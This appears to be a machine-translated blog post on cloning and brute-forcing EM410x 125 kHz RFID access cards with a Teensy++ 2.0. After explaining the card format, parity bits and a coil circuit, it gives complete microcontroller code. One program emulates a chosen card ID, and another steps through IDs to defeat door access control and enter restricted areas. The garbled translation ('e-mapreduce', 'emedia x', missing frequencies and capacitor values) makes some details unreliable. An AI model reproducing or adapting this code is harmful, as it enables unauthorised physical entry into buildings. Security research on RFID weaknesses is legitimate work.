Use Teensy to simulate the e-mapreduce x card and crack the feasibility of the e-mapreduce X-class access control system.

The previous day, Open started Teensy ++ 2.0. Therefore, we studied Teensy ++ 2.0 simulation eminix and conducted a brute-force cracking test on the access control of eminix, the following is the relevant code and content.

 

What is low frequency? What is emedia X?

First, I have to mention those low-frequency cards that work at a KHz frequency (for example, emstmx) so that you can better read the following content.

What is low frequency? The following is an explanation of low frequency:

Low frequency (LF, Low frequency) refers to the radio waves from 30 kHz to kHz. Some radio frequency identification (RFID technology) tags use low frequency. These tags are generally called LFID's or LowFID's (Low Frequency Identification of Low Frequency Identification ).

However, LFID's/LowFID's commonly used (non-unique) frequencies are 125 kHz/134 kHz, and 125 kHz/134kHz are only the frequencies based on low frequency RFID, this frequency does not have any function, that is, the frequency itself does not have the so-called ID Recognition, read write, and so on, and common low frequency cards include HID, T55xx, em1_x and other series, these series of low-frequency cards are often used in our daily lives. This time we are talking about the use of the eminix series for Access Control ID Identification Based on kHz.

The following is the EM410x format:

1 1 1 1 1 1 1 1 1 1 9bits Header

8 bits version or vendor ID

D00 D01 D02 D03 P0

D10 D11 D12 D13 P1

D20 D21 D22 D23 P2

D30 D31 D32 D33 P3

D40 D41 D42 D43 P4 10bits row Test

D50 D51 D52 D53 P5

32bits data D60 D61 D62 D63 P6

D70 D71 D72 D73 P7

D80 D81 D82 D83 P8

D90 D91 D92 D93 P9

PC0 PC1 PC2 PC3 S0

4. Ranking Verification

The 64-bit data inside 9 consecutive 1 as the beginning of the data, and the D00-D93 is the user data, the P0-P9 is the row even check bit, the PC0-PC3 is the column even check bit, S0 for the Data Detection bit.

What is even verification?The number of data 1 is an odd or even number..

For example, if the binary value of 0 × 01 is 0001, the number of 1 in the data is an odd number. If the double check is performed, the value 00011 indicates that the number of 1 is an even number, if the data is 1110, the even verification is 11101. On the contrary, the odd verification is 11100.

The following example shows the EM410x format:

If I have an emedia x card, and the ID printed on the card will be:

0005206306

If you use Proxmark3 or a low-frequency card reader to read data, you will see an extra two-digit ID value, which may be an 8bit version, vendor, or user ID. If we use Proxmark3 to read the ID:

0 × 0600503472

The corresponding 0x00503472 = 5206306, while 0x06 is the identifier, and what will happen to its format? Take a look at the following analysis:

First, the data header:

111111111

Card number data and row even check bit

0 = 0000 0

6 = 0110 0

0 = 0000 0

0 = 0000 0

5 = 0101 0

0 = 0000 0

3 = 0011 0

4 = 0100 1

7 = 0111 1

2 = 0010 1

P = 0001 (Column even check bit)

0 ends

From the above data, we will get the following values:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

This is the EM410x format. If you have any questions, use Google and other search engines to search for information. Next we will talk about how to use Teensy to simulate EM410x.

Use Teensy to simulate emedia x Tag

Hardware component list:

1. kHz-based low frequency Coils

2. Capacitor

3. Transistor 2N3904

4. Resistance: 10 KB

5. Teensy ++ 2.0

How to make a kHz resonant circuit. We need to know the LC resonance formula.

F frequency L inductance C Capacitance

If the Coil Inductance you bought is 345UH, a PF capacitor will be used. If the Coil Inductance is 730UH, a PF capacitor will be used. After the antenna is configured, use Teensy ++ 2.0 to write the following code. Of course, you can also use the Arduino Development Board.

The code used to simulate emedia X in Teensy ++ 2.0 is as follows:

String sStart = “1111111110000000000″;//String sStop = “0″;int data_to_spoof[64];int coil_pin = 9;int a,b,c,d;unsigned long id;char HexCode[8];void setup(){// Serial.begin(9600);pinMode(coil_pin, OUTPUT);digitalWrite(coil_pin, LOW);id = 0×503472;a=0;b=0;c=0;d=0;sprintf(HexCode,”%04X%04X”,id);String s = sStart + Em4xCode(HexCode[4]) + Em4xCode(HexCode[5]) + Em4xCode(HexCode[6]) + Em4xCode(HexCode[7]) + Em4xCode(HexCode[0]) + Em4xCode(HexCode[1]) + Em4xCode(HexCode[2]) + Em4xCode(HexCode[3]) + EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;// Serial.println(s);toCode(s);}void set_pin_manchester(int clock_half, int signal){int man_encoded = clock_half ^ signal;if(man_encoded == 1){digitalWrite(coil_pin, HIGH);}else{digitalWrite(coil_pin, LOW);}}String Em4xCode(String code){if (code == ’1′) {d+=1;return “00011″;}if (code == ’2′) {c+=1;return “00101″;}if (code == ’3′) {c+=1;d+=1;return “00110″;}if (code == ’4′) {b+=1;return “01001″;}if (code == ’5′) {b+=1;d+=1;return “01010″;}if (code == ’6′) {b+=1;c+=1;return “01100″;}if (code == ’7′) {b+=1;c+=1;d+=1;return “01111″;}if (code == ’8′) {a+=1;return “10001″;}if (code == ’9′) {a+=1;d+=1;return “10010″;}if (code == ‘A’) {a+=1;c+=1;return “10100″;}if (code == ‘B’) {a+=1;c+=1;d+=1;return “10111″;}if (code == ‘C’) {a+=1;b+=1;return “11000″;}if (code == ‘D’) {a+=1;b+=1;d+=1;return “11011″;}if (code == ‘E’) {a+=1;b+=1;c+=1;return “11101″;}if (code == ‘F’) {a+=1;b+=1;c+=1;d+=1;return “11110″;}return “00000″;}String EvenParity(int Parity){if ((Parity % 2) == 1) return “1″;return “0″;}void toCode(String s){for(int i = 0; i < 64; i++){if (s[i]==’0′){data_to_spoof[i]=0;}else{data_to_spoof[i]=1;}}}void loop(){for(int i = 0; i < 64; i++){set_pin_manchester(0, data_to_spoof[i]);delayMicroseconds(256);set_pin_manchester(1, data_to_spoof[i]);delayMicroseconds(256);}}

It is suggested that you may not understand why it is sent, because it is encoded as the Manchester code, so I would like to mention it here.

For example, to send 64-bit data:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

How long does it take to transmit one digit? The answer is 64,125 khz equals 512us, that is, 512us transfers 1 bit, but the Manchester code is expressed in 2 bits. If the data is 1, the Manchester code is 10, and the data is 0, the Manchester code is 01. Therefore, when the transfer is performed, the 512us data should be converted to the Manchester code, which should be transferred to the 512us/2 = 256us data. However, the program converts the 64-bit data to the Manchester code for sending, therefore, the sending interval is delayMicroseconds (256 );

When we use Teensy for related simulation operations, we find that as long as we do the relevant exhaustive test, or we can quickly break through the restrictions of the access control system to enter the restricted area, in the test environment, because the card reader does not have any delay reading, we can provide the relevant TagID very quickly, but because each access control has its own settings and environmental factors, we are not sure whether the following exhaustive code is suitable for everyone. Therefore, we will write this article by proposing feasible conjecture.

The following is the code of the brute force testing program:

 

String sStart = “1111111110000000000″;String sStop = “0″;int data_to_spoof[64];int led = 6;int coil_pin = 9;int a,b,c,d;unsigned long id;char HexCode[8];void setup(){// Serial.begin(9600);pinMode(led, OUTPUT);pinMode(coil_pin, OUTPUT);digitalWrite(coil_pin, LOW);id = 0x502E96;}void set_pin_manchester(int clock_half, int signal){int man_encoded = clock_half ^ signal;if(man_encoded == 1){digitalWrite(coil_pin, HIGH);}else{digitalWrite(coil_pin, LOW);}}String Em4xCode(String code){if (code == ’1′) {d+=1;return “00011″;}if (code == ’2′) {c+=1;return “00101″;}if (code == ’3′) {c+=1;d+=1;return “00110″;}if (code == ’4′) {b+=1;return “01001″;}if (code == ’5′) {b+=1;d+=1;return “01010″;}if (code == ’6′) {b+=1;c+=1;return “01100″;}if (code == ’7′) {b+=1;c+=1;d+=1;return “01111″;}if (code == ’8′) {a+=1;return “10001″;}if (code == ’9′) {a+=1;d+=1;return “10010″;}if (code == ‘A’) {a+=1;c+=1;return “10100″;}if (code == ‘B’) {a+=1;c+=1;d+=1;return “10111″;}if (code == ‘C’) {a+=1;b+=1;return “11000″;}if (code == ‘D’) {a+=1;b+=1;d+=1;return “11011″;}if (code == ‘E’) {a+=1;b+=1;c+=1;return “11101″;}if (code == ‘F’) {a+=1;b+=1;c+=1;d+=1;return “11110″;}return “00000″;}String EvenParity(int Parity){if ((Parity % 2) == 1) return “1″;return “0″;}void toCode(String s){for(int i = 0; i < 64; i++){if (s[i]==’0′){data_to_spoof[i]=0;}else{data_to_spoof[i]=1;}}}void loop(){a=0;b=0;c=0;d=0;sprintf(HexCode,”%04X%04X”,id);String s = sStart + Em4xCode(HexCode[4]) + Em4xCode(HexCode[5]) + Em4xCode(HexCode[6]) + Em4xCode(HexCode[7]) + Em4xCode(HexCode[0]) + Em4xCode(HexCode[1]) + Em4xCode(HexCode[2]) + Em4xCode(HexCode[3]) + EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;// Serial.println(s);toCode(s);for(int ii = 0; ii < 2; ii++){for(int i = 0; i < 64; i++){set_pin_manchester(0, data_to_spoof[i]);delayMicroseconds(265);set_pin_manchester(1, data_to_spoof[i]);delayMicroseconds(265);}}if (id == 0x50308A){digitalWrite(led, HIGH);}id += 1;if (id > 0xFFFFFFFF ){id=0;}}